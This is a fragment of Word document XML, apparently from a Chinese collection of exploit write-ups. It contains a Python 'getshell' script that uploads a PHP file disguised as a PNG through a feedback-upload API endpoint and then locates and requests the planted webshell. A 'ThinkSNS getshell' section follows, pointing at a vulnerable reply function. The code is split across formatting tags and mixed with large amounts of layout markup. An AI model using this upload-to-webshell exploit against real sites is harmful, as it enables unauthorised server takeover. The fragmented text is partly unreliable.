                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="180" w:right="72"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>def</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> getshell(host):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736" w:firstLine="914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not host.startswith('http://') and not host.startswith('https://'):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2012" w:right="72"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>url</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = 'http://' + host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72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</w:rPr>
                    <w:t>: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72"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>url</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = host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04" w:firstLine="914"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>files</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = {'file': ('x.php', open('e:\\ma\\php\\phpinfo.txt', 'rb'), 'image/png')}</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="1047" w:firstLine="914"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>req</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = requests.post(url + '/api.php?log=feedback_upload', files = files)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="72" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>match =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-72"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>re.search(r'(\</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>d{</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>5}).*file:"(.*\.php)"', req.content)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1095" w:right="72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match.group(1) and match.group(2):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附上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>Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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4832" type="#_x0000_t202" style="width:337.5pt;height:164.9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380" w:firstLine="1831"/>
                  </w:pPr>
                  <w:bookmarkStart w:id="83" w:name="getshell"/>
                  <w:bookmarkStart w:id="84" w:name="ThinkSNS_getshell"/>
                  <w:bookmarkStart w:id="85" w:name="_bookmark38"/>
                  <w:bookmarkEnd w:id="83"/>
                  <w:bookmarkEnd w:id="84"/>
                  <w:bookmarkEnd w:id="85"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>shell</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = '%s/upload/%s/temp/%s'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>%(url, match.group(1), match.group(2))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2012" w:right="1584"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>req</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = requests.get(shell) if req.status_code == 200:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1076" w:right="641"/>
                    <w:jc w:val="center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shell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else</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1552"/>
                    </w:tabs>
                    <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="2443" w:firstLine="1831"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>print</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> match.group() if </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="116"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>name</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:color w:val="333333"/>
                      <w:u w:val="single" w:color="323232"/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>== '  main</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="116"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>':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getshell(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'http://**.**.**.**/')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10"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="47"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>ThinkSNS getshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:t>作者：猪头子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="44"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>\apps\public\Lib\Action\CommentAction.class.php reply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s4831" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:18.9pt;width:337.5pt;height:34.55pt;z-index:7432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public</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> function reply() {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MS Mincho"/>
          <w:sz w:val="25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4528" style="width:337.75pt;height:491.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,9824">
            <v:rect id="_x0000_s4830" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4829" style="position:absolute;left:185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4828" style="position:absolute;left:285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4827" style="position:absolute;left:385;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4826" style="position:absolute;left:485;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4825" style="position:absolute;left:585;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4824" style="position:absolute;left:685;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4823" style="position:absolute;left:785;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4822" style="position:absolute;left:885;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4821" style="position:absolute;left:985;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4820" style="position:absolute;left:1085;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4819" style="position:absolute;left:1185;top:248;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4818" style="position:absolute;left:1667;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4817" style="position:absolute;left:1787;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4816" style="position:absolute;left:1908;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4815" style="position:absolute;left:2028;top:248;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4814" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4813" style="position:absolute;left:185;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4812" style="position:absolute;left:285;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4811" style="position:absolute;left:385;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4810" style="position:absolute;left:485;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4809" style="position:absolute;left:585;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4808" style="position:absolute;left:685;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4807" style="position:absolute;left:785;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4806" style="position:absolute;left:885;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4805" style="position:absolute;left:985;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4804" style="position:absolute;left:1085;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4803" style="position:absolute;left:1185;top:574;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4802" style="position:absolute;left:3113;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4801" style="position:absolute;left:3233;top:574;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4800" style="position:absolute;left:3354;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4799" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4798" style="position:absolute;left:185;top:900;width:4699;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4797" style="position:absolute;left:4884;top:900;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4796" style="position:absolute;left:5005;top:900;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4795" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4794" style="position:absolute;left:185;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4793" style="position:absolute;left:285;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4792" style="position:absolute;left:385;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4791" style="position:absolute;left:485;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4790" style="position:absolute;left:585;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4789" style="position:absolute;left:685;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4788" style="position:absolute;left:785;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4787" style="position:absolute;left:885;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4786" style="position:absolute;left:985;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4785" style="position:absolute;left:1085;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4784" style="position:absolute;left:1185;top:1226;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4783" style="position:absolute;left:3474;top:1226;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4782" style="position:absolute;left:3595;top:1226;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4781" style="position:absolute;left:3715;top:1226;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4780" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4779" style="position:absolute;left:185;top:1552;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4778" style="position:absolute;left:6451;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4777" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4776" style="position:absolute;left:185;top:1878;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4775" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4774" style="position:absolute;left:185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4773" style="position:absolute;left:285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4772" style="position:absolute;left:385;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4771" style="position:absolute;left:485;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4770" style="position:absolute;left:585;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4769" style="position:absolute;left:685;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4768" style="position:absolute;left:785;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4767" style="position:absolute;left:885;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4766" style="position:absolute;left:985;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4765" style="position:absolute;left:1085;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4764" style="position:absolute;left:1185;top:2204;width:2048;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4763" style="position:absolute;left:3233;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4762" style="position:absolute;left:3333;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4761" style="position:absolute;left:3433;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4760" style="position:absolute;left:3554;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4759" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4758" style="position:absolute;left:185;top:2530;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4757" style="position:absolute;left:3559;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4756" style="position:absolute;left:3679;top:2530;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4755" style="position:absolute;left:3920;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4754" style="position:absolute;left:4041;top:2530;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4753" style="position:absolute;left:4764;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4752" style="position:absolute;left:4864;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4751" style="position:absolute;left:4964;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4750" style="position:absolute;left:5084;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4749" style="position:absolute;left:5205;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4748" style="position:absolute;left:5325;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4747" style="position:absolute;left:5446;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4746" style="position:absolute;left:5566;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4745" style="position:absolute;left:5687;top:2530;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4744" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4743" style="position:absolute;left:185;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4742" style="position:absolute;left:285;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4741" style="position:absolute;left:385;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4740" style="position:absolute;left:485;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4739" style="position:absolute;left:585;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4738" style="position:absolute;left:685;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4737" style="position:absolute;left:785;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4736" style="position:absolute;left:885;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4735" style="position:absolute;left:985;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4734" style="position:absolute;left:1085;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4733" style="position:absolute;left:1185;top:2856;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4732" style="position:absolute;left:3354;top:2856;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4731" style="position:absolute;left:3474;top:2856;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4730" style="position:absolute;left:3595;top:2856;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4729" style="position:absolute;left:3715;top:2856;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4728" style="position:absolute;left:5;top:3119;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4727" style="position:absolute;left:185;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4726" style="position:absolute;left:285;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4725" style="position:absolute;left:385;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4724" style="position:absolute;left:485;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4723" style="position:absolute;left:585;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4722" style="position:absolute;left:685;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4721" style="position:absolute;left:785;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4720" style="position:absolute;left:885;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4719" style="position:absolute;left:985;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4718" style="position:absolute;left:1085;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4717" style="position:absolute;left:1185;top:3152;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4716" style="position:absolute;left:1426;top:3152;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4715" style="position:absolute;left:1526;top:3152;width:1400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4714" style="position:absolute;left:5;top:3445;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4713" style="position:absolute;left:185;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4712" style="position:absolute;left:285;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4711" style="position:absolute;left:385;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4710" style="position:absolute;left:485;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4709" style="position:absolute;left:585;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4708" style="position:absolute;left:685;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4707" style="position:absolute;left:785;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4706" style="position:absolute;left:885;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4705" style="position:absolute;left:985;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4704" style="position:absolute;left:1085;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4703" style="position:absolute;left:1185;top:3508;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4702" style="position:absolute;left:2149;top:3508;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4701" style="position:absolute;left:2269;top:3508;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4700" style="position:absolute;left:2390;top:3508;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4699" style="position:absolute;left:5;top:3771;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4698" style="position:absolute;left:185;top:3834;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4697" style="position:absolute;left:5;top:4097;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4696" style="position:absolute;left:185;top:4160;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4695" style="position:absolute;left:5;top:4423;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4694" style="position:absolute;left:185;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4693" style="position:absolute;left:285;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4692" style="position:absolute;left:385;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4691" style="position:absolute;left:485;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4690" style="position:absolute;left:585;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4689" style="position:absolute;left:685;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
